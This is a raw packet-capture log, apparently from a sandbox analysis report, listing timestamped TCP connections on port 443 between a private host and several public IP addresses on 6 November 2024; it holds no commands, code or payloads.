                                                                                                                                              Nov 6, 2024 16:55:59.854351997 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.866039991 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.882011890 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.887037039 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.887114048 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.887142897 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.887164116 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.887170076 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.887183905 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.887221098 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.887653112 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.887696981 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.887707949 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.888223886 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.888268948 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.888277054 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.888319016 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.888358116 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.888365030 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.888509989 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.888580084 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.888607025 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.888619900 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.888638973 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.888676882 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.888926029 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.888982058 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889022112 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.889029026 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889061928 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889067888 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889095068 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889106035 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.889112949 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889122009 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.889128923 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889144897 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889147997 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.889158010 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889202118 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.889208078 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889286041 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889323950 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.889569044 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.889583111 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889775038 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889801025 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889822006 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889822006 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.889833927 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.889866114 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.890609980 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.890657902 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.890708923 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.890815973 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.890860081 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.890875101 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.891463995 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.891505003 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.891511917 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.891537905 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.891582966 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.891609907 CET49834443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.891644955 CET44349834188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.891702890 CET49834443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.892033100 CET49834443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.892046928 CET44349834188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.892127037 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.892138958 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.894700050 CET49835443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.894722939 CET44349835188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.894785881 CET49835443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.895028114 CET49835443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.895040989 CET44349835188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.897991896 CET49831443192.168.2.18185.199.110.133
                                                                                                                                              Nov 6, 2024 16:55:59.903975010 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.904046059 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.904097080 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.904098988 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.904109001 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.904151917 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.904285908 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.904351950 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.904393911 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.904397964 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.904406071 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.904448986 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.904455900 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.905292988 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.905327082 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.905347109 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.905352116 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.905391932 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.905395031 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.905421972 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.905467033 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.905590057 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.905597925 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.907721043 CET49836443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.907761097 CET44349836188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.907831907 CET49836443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.908056021 CET49836443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.908071041 CET44349836188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.004488945 CET4434983013.33.187.96192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.004811049 CET49830443192.168.2.1813.33.187.96
                                                                                                                                              Nov 6, 2024 16:56:00.004841089 CET4434983013.33.187.96192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.005904913 CET4434983013.33.187.96192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.005990982 CET49830443192.168.2.1813.33.187.96
                                                                                                                                              Nov 6, 2024 16:56:00.006264925 CET49830443192.168.2.1813.33.187.96
                                                                                                                                              Nov 6, 2024 16:56:00.006334066 CET4434983013.33.187.96192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.006443024 CET49830443192.168.2.1813.33.187.96
                                                                                                                                              Nov 6, 2024 16:56:00.006453991 CET4434983013.33.187.96192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.058032990 CET49830443192.168.2.1813.33.187.96
                                                                                                                                              Nov 6, 2024 16:56:00.160188913 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.160350084 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.160376072 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.160410881 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.160432100 CET49831443192.168.2.18185.199.110.133
                                                                                                                                              Nov 6, 2024 16:56:00.160439968 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.160459995 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.160476923 CET49831443192.168.2.18185.199.110.133
                                                                                                                                              Nov 6, 2024 16:56:00.160501003 CET49831443192.168.2.18185.199.110.133
                                                                                                                                              Nov 6, 2024 16:56:00.160506010 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.160939932 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.160995960 CET49831443192.168.2.18185.199.110.133
                                                                                                                                              Nov 6, 2024 16:56:00.161007881 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.161326885 CET49831443192.168.2.18185.199.110.133
                                                                                                                                              Nov 6, 2024 16:56:00.161358118 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.161411047 CET49831443192.168.2.18185.199.110.133
                                                                                                                                              Nov 6, 2024 16:56:00.195883989 CET49837443192.168.2.18185.199.111.133
                                                                                                                                              Nov 6, 2024 16:56:00.195923090 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.196027040 CET49837443192.168.2.18185.199.111.133
                                                                                                                                              Nov 6, 2024 16:56:00.196245909 CET49837443192.168.2.18185.199.111.133
                                                                                                                                              Nov 6, 2024 16:56:00.196259022 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.251291990 CET4434983013.33.187.96192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.254465103 CET4434983013.33.187.96192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.254475117 CET4434983013.33.187.96192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.254498959 CET4434983013.33.187.96192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.254508018 CET4434983013.33.187.96192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.254519939 CET4434983013.33.187.96192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.254565954 CET49830443192.168.2.1813.33.187.96
                                                                                                                                              Nov 6, 2024 16:56:00.254591942 CET4434983013.33.187.96192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.254606009 CET49830443192.168.2.1813.33.187.96
                                                                                                                                              Nov 6, 2024 16:56:00.254858971 CET49830443192.168.2.1813.33.187.96
                                                                                                                                              Nov 6, 2024 16:56:00.254905939 CET4434983013.33.187.96192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.254976988 CET49830443192.168.2.1813.33.187.96
                                                                                                                                              Nov 6, 2024 16:56:00.322016954 CET44349832188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.322324991 CET49832443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.322335005 CET44349832188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.323380947 CET44349832188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.323448896 CET49832443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.323717117 CET49832443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.323730946 CET49832443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.323764086 CET44349832188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.323779106 CET49832443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.323811054 CET49832443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.324074984 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.324104071 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.324173927 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.324357986 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.324368000 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.455950975 CET44349833188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.456262112 CET49833443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.456305027 CET44349833188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.457375050 CET44349833188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.457452059 CET49833443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.457842112 CET49833443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.457854986 CET49833443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.457902908 CET49833443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.457911015 CET44349833188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.457982063 CET49833443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.458184958 CET49839443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.458242893 CET44349839188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.458303928 CET49839443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.458630085 CET49839443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.458643913 CET44349839188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.466507912 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.466665030 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.466696978 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.466731071 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.466739893 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.466782093 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.466785908 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.466794968 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.466847897 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.467109919 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.467170000 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.467206955 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.467211962 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.494607925 CET44349834188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.494883060 CET49834443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.494899988 CET44349834188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.496032000 CET44349834188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.496105909 CET49834443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.496383905 CET49834443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.496397972 CET49834443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.496440887 CET49834443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.496454954 CET44349834188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.496510029 CET49834443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.496680975 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.496714115 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.496793032 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.496964931 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.496975899 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.518018007 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.518028021 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.527012110 CET44349835188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.527245045 CET49835443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.527270079 CET44349835188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.528330088 CET44349835188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.528395891 CET49835443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.528692007 CET49835443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.528727055 CET49835443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.528755903 CET44349835188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.528832912 CET49835443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.528832912 CET49835443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.528845072 CET44349835188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.528898954 CET49835443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.529078007 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.529113054 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.529190063 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.529429913 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.529444933 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.562414885 CET44349836188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.562649965 CET49836443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.562680006 CET44349836188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.563750982 CET44349836188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.563822031 CET49836443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.564122915 CET49836443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.564137936 CET49836443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.564167023 CET49836443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.564183950 CET44349836188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.564249992 CET49836443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.564455032 CET49842443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.564476013 CET44349842188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.564553976 CET49842443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.564718962 CET49842443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.564734936 CET44349842188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.565018892 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.585014105 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.585100889 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.585131884 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.585145950 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.585153103 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.585195065 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.585666895 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.585769892 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.585807085 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.585814953 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.585820913 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.585861921 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.586433887 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.586560965 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.586594105 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.586602926 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.586608887 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.586636066 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.586651087 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.586731911 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.586771011 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.586927891 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.586941957 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.586951017 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.586986065 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.587302923 CET49843443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.587321997 CET44349843188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.587404013 CET49843443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.588114977 CET49843443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.588129044 CET44349843188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.805454016 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.805787086 CET49837443192.168.2.18185.199.111.133
                                                                                                                                              Nov 6, 2024 16:56:00.805814981 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.806905031 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.806989908 CET49837443192.168.2.18185.199.111.133
                                                                                                                                              Nov 6, 2024 16:56:00.807296991 CET49837443192.168.2.18185.199.111.133
                                                                                                                                              Nov 6, 2024 16:56:00.807389021 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.807476997 CET49837443192.168.2.18185.199.111.133
                                                                                                                                              Nov 6, 2024 16:56:00.807486057 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.852019072 CET49837443192.168.2.18185.199.111.133
                                                                                                                                              Nov 6, 2024 16:56:00.933231115 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.933630943 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.933656931 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.934684992 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.934777975 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.935092926 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.935154915 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.935260057 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:00.935270071 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.980094910 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.259304047 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.259376049 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.259412050 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.259424925 CET49837443192.168.2.18185.199.111.133
                                                                                                                                              Nov 6, 2024 16:56:01.259442091 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.259483099 CET49837443192.168.2.18185.199.111.133
                                                                                                                                              Nov 6, 2024 16:56:01.259485960 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.259497881 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.259542942 CET49837443192.168.2.18185.199.111.133
                                                                                                                                              Nov 6, 2024 16:56:01.259550095 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.259609938 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.259644032 CET49837443192.168.2.18185.199.111.133
                                                                                                                                              Nov 6, 2024 16:56:01.259649992 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.259660959 CET44349837185.199.111.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.259710073 CET49837443192.168.2.18185.199.111.133
                                                                                                                                              Nov 6, 2024 16:56:01.261208057 CET49837443192.168.2.18185.199.111.133
                                                                                                                                              Nov 6, 2024 16:56:01.261225939 CET44349837185.199.111.133192.168.2.18
